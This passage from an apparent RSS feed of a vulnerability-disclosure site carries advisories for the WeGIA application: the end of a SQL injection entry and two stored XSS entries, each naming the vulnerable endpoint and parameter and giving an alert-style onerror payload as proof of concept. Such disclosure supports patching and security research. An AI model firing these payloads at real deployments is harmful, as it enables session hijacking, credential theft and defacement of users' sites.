		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;189&amp;#34;
		data-flex-basis=&amp;#34;454px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Database: wegia&amp;lt;/br&amp;gt;
Table: pessoa&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-30367/394313600-943e8f8f-87f5-4c79-8642-832342e8fbc0.png&amp;#34;
	width=&amp;#34;1906&amp;#34;
	height=&amp;#34;235&amp;#34;
	srcset=&amp;#34;/p/cve-2025-30367/394313600-943e8f8f-87f5-4c79-8642-832342e8fbc0_hu_e9c3a498acd0f755.png 480w, /p/cve-2025-30367/394313600-943e8f8f-87f5-4c79-8642-832342e8fbc0_hu_69c3b0e6a6229391.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;811&amp;#34;
		data-flex-basis=&amp;#34;1946px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to sensitive data: An attacker can access confidential information such as credentials, personal or financial data.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Compromise of user accounts: Using stolen credentials, attackers can gain full access to the application and perform actions on behalf of legitimate users.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Data exfiltration: Possibility of stealing large volumes of information by dumping entire database tables.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reputational damage: Exposing customer data or business information can significantly harm the organization&amp;#39;s image.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Execution of chain attacks: Obtained information can be used to carry out new attacks, such as targeted phishing or attacks on interconnected systems.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-7j9v-xgmm-h7wr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-7j9v-xgmm-h7wr&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reporter&amp;#34;&amp;gt;Reporter
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 27 Mar 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-29782</title>
        <link>https://www.cvehunters.com/p/cve-2025-29782/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-29782/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-29782-cross-site-scripting-xss-stored-endpoint-adicionar_tipo_docs_atendidophp-parameter-tipo&amp;#34;&amp;gt;CVE-2025-29782: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;adicionar_tipo_docs_atendido.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;tipo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-29782&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-29782&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;adicionar_tipo_docs_atendido.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;tipo&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /dao/adicionar_tipo_docs_atendido.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-29782-cross-site-scripting-xss-stored-endpoint-adicionar_tipo_docs_atendidophp-parameter-tipo&amp;#34;&amp;gt;CVE-2025-29782: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;adicionar_tipo_docs_atendido.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;tipo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-29782&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-29782&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;adicionar_tipo_docs_atendido.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;tipo&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /dao/adicionar_tipo_docs_atendido.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;tipo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;adicionar_tipo_docs_atendido.php&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;document&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;body&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;innerHTML&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;&amp;amp;lt;img src=x onerror=alert(&amp;amp;#34;XSS&amp;amp;#34;)&amp;amp;gt;&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-29782/418279224-c23a2df8-d696-4484-906b-4c5bc28b187b.png&amp;#34;
	width=&amp;#34;1030&amp;#34;
	height=&amp;#34;430&amp;#34;
	srcset=&amp;#34;/p/cve-2025-29782/418279224-c23a2df8-d696-4484-906b-4c5bc28b187b_hu_70ca78f911d74ca4.png 480w, /p/cve-2025-29782/418279224-c23a2df8-d696-4484-906b-4c5bc28b187b_hu_869a393717f2392f.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;239&amp;#34;
		data-flex-basis=&amp;#34;574px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-29782/418279230-621c5b71-f0b7-4b0b-814b-57dcca94c5e4.png&amp;#34;
	width=&amp;#34;1133&amp;#34;
	height=&amp;#34;263&amp;#34;
	srcset=&amp;#34;/p/cve-2025-29782/418279230-621c5b71-f0b7-4b0b-814b-57dcca94c5e4_hu_85c5c6b2acd962ab.png 480w, /p/cve-2025-29782/418279230-621c5b71-f0b7-4b0b-814b-57dcca94c5e4_hu_723c3d8073bcf1d9.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;430&amp;#34;
		data-flex-basis=&amp;#34;1033px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-5x5w-5c99-vr8h&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-5x5w-5c99-vr8h&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributors&amp;#34;&amp;gt;Contributors
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/rafael50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Rafael Corvino&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 14 Mar 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-27417</title>
        <link>https://www.cvehunters.com/p/cve-2025-27417/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-27417/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-27417-cross-site-scripting-xss-stored-endpoint-adicionar_status_atendidophp-parameter-status&amp;#34;&amp;gt;CVE-2025-27417: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;adicionar_status_atendido.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;status&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-27417&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-27417&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;adicionar_status_atendido.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;status&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /dao/adicionar_status_atendido.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-27417-cross-site-scripting-xss-stored-endpoint-adicionar_status_atendidophp-parameter-status&amp;#34;&amp;gt;CVE-2025-27417: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;adicionar_status_atendido.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;status&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-27417&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-27417&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;adicionar_status_atendido.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;status&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /dao/adicionar_status_atendido.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;status&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;adicionar_status_atendido.php&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;document&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;body&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;innerHTML&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;&amp;amp;lt;img src=x onerror=alert(&amp;amp;#34;XSS&amp;amp;#34;)&amp;amp;gt;&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-27417/402950010-34f7ccad-b6f2-41cd-9e85-3c50bba2329e.png&amp;#34;
	width=&amp;#34;1041&amp;#34;
	height=&amp;#34;347&amp;#34;
	srcset=&amp;#34;/p/cve-2025-27417/402950010-34f7ccad-b6f2-41cd-9e85-3c50bba2329e_hu_e4d83d478a253d2f.png 480w, /p/cve-2025-27417/402950010-34f7ccad-b6f2-41cd-9e85-3c50bba2329e_hu_54ed63879b01a596.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;300&amp;#34;
		data-flex-basis=&amp;#34;720px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-27417/402947687-b239a5c3-fabd-414a-8be6-ef1974ecad1f.png&amp;#34;
	width=&amp;#34;1359&amp;#34;
	height=&amp;#34;289&amp;#34;
	srcset=&amp;#34;/p/cve-2025-27417/402947687-b239a5c3-fabd-414a-8be6-ef1974ecad1f_hu_bc4b9ee997aed5a3.png 480w, /p/cve-2025-27417/402947687-b239a5c3-fabd-414a-8be6-ef1974ecad1f_hu_19686a33738656f3.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;470&amp;#34;
		data-flex-basis=&amp;#34;1128px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
